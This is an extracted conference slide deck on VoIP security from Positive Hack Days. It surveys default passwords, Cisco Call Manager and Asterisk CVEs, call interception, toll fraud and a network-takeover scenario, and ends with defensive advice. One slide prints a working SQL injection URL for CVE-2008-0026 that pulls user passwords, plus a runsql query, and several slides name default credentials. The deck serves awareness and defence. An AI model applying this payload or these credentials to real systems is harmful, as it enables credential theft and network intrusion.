Positive Hack Days. Gurzov. VOIP - Reduce Your Expenses, Increase Your Income! Or Vice Versa?

VoIP security legends and

myths

Konstantin Gurzov

Head of Sales Support Department

VoIP is attractive!

VoIP

Access company’s network

Manage calls (fraud)

Data defect and replacement

Call interception

Personal data theft

and so on…

VoIP infrastructure components

TRANSPORT

APPLICATION SERVERS

MANAGING

BACK-END DEVICES BOUNDARY

DEVICES

PSTN

IP NETWORKS

INTERNET

LOCAL NETWORK BRANCHES

Attacker’s computer

Guest Wi-Fi network

VoIP segment is an integration of a number of specialized platforms and network devices, different

networks and technologies

All local network threats are actual for VoIP

Default passwords

Managing web interfaces

Software vulnerabilities

Traffic interception

Account blocking

Default passwords

Known threats – former protection measures

Примеры рассчитанных метрик на основе "живых" данных при проведении внутренних аудитов ИБ специалистами компании Positive Technologies, 2009 г.

About 50% of all network devices have default or easily bruteforced passwords

Back-end devices•Default PIN for CISCO IP PHONE - «**#*»

SIP gateways•Default password for Asterisk - «admin» leads to:

Denial of service Interception Integrity violation Toll Fraud

Examples

Reconfiguration

Minoring

Interception

Managing web interfaces•SQL Injection•Сross Site Scripting•DoS• and so on.

Known threats – former protection measures

If an attacker manages to access your device web interface, attacks are guaranteed to be successful

CISCO Call Manager• CVE-2010-3039 privilege gaining• CVE-2007-4633 XSS• CVE-2007-4634 SQL Injection• CVE-2008-0026 SQL Injection

Asterisk GUI• CVE-2008-1390 CVSS Base Score 9,3

Examples

The possibility to detect vulnerabilities of different risk level, based on analysis of 5560 sites conducted by Positive Technologies experts, 2009

Known threats – former protection measures

Software vulnerabilities

Arbitrary code execution from the network in в CISCO Call Manager 6

Vulnerability allows attackers to execute

arbitrary code

Known threats – former protection measures

Software vulnerability

Denial of service in CISCO Call Manager 6

Vulnerability allows attackers to cause a

denial of service

Services are unavailable and restricted•web interfaces with vulnerabilities•weak password policy

Known threats – former protection measures

Any VoIP device is a member of Ethernet network, so it is vulnerable to a most part of network attacks

Traffic listening•weakly protected wireless networks• Implementation of «Man in the middle» attack• Tens of specialized applications to listen VoIP traffic, for

example, Cain&Abel (www.oxid.it), UCSniff (http://ucsniff.sourceforge.net)

Known threats – former protection measures

Traffic listening leads to violation of confidentiality and personal data thefts

Examples of real attacks

Traffic fraud

Interception of negotiations

Capture of corporate network

Traffic fraud

PSTN

COMPANY «А» VOIP PROVIDER

IP PBX 2

IP PBX 1Company «Client»

SIP trunk

H.323, SIP

Guest Wi-Fi network

Attacker’s computerIP PBX 1 – Client’s IP PBX of «А» company

IP PBX 2 – Attacker’s IP PBX

1. No ACLs on devices2. Weak device and software password policy3. Low protection level as a whole for VoIP infrastructure4. Billing once a month

Traffic fraud – attacker’s actions

PSTN

COMPANY «А» VOIP PROVIDER

IP PBX 2

IP PBX 1Company «Client»

SIP trunk

H.323, SIP

Guest Wi-Fi network

Attacker’s computer

1. Scan the network and find IP PBX 1.

2. Provide PSTN connection to IP PBX 2 via IP PBX 1.

3. Pass expensive MG/MH calls via «А» into PSTN.

1

2

3«А» operator is unable to explicitly separate responsibilities between itself and its client, so it pays

always

Traffic fraud – can be avoided if

operator:

configures ACLs on external interfaces of client IP PBX;

ensures that calls passed through SIP trank are not routed back;

blocks MG/MH calls if not used;

distributes password policy to VoIP services;

offers services for protection analysis of client’s hardware.

PSTN

IP PBX

Company «А»

TOPTOP

Out of company «А»

office

Attacker’s computer

WEP

Interception of negotiations

1. Use wireless networks2. Weak encryption algorithms3. ACLs are not used4. Weak password policy

Capture corporate network

PSTN

IP PBX

«А» company

TOPTOPOut of

company «А» office

Attacker’s computer

WEP

КЛВС

SQL injectionCVE-2008-0026

5. No managing of changes

Capture corporate network – attacker’s actions

PSTN

IP PBX

Компания «А»

ТОПТОП

Вне офиса Компании «А»

Компьютер нарушителя

WEP

КЛВС

SQL injectionCVE-2008-0026

2

3

1. Get access to the corporate network via Wi-Fi

2. Find CISCO Call Manager by typical responsea) uses SQLi implemented CVE-2008-0026

b) gets user password hashes equivalent to the request

c) restores passwords from hashes

3. One of restored passwords is Admin password for all CISCO local networks

runsql select user,password from applicationuser

https://www.example.org/ccmuser/personaladdressbookEdit.do?key='+UNION+ALL+SELECT+'','','',user,'',password+from+applicationuser;--

1

An attacker can capture all local network via VoIP services

Conclusions

1. VoIP infrastructure is vulnerable to the same security threats as an ordinary corporate network

2. VoIP service vulnerabilities LAN vulnerabilities

3. The same methods are used to create protected infrastructure in VoIP as in LAN

Advices to create secure infrastructure

Advice 1: monitor changes and updates in your VoIP infrastructure.

Advice 2: distribute password policy to VoIP services, use strong crypto algorithms.

Advice 3: use compliance and vulnerability management system to prevent incidents.

Advice 4: offer security level monitoring for clients hardware as VAS.

Advice 5: take a broad view of your infrastructure security, remember it is not only working stations and e-mail system.

Thank you for your attention!

Questions?

Konstantin Gurzov

kgurzov@ptsecurity.ru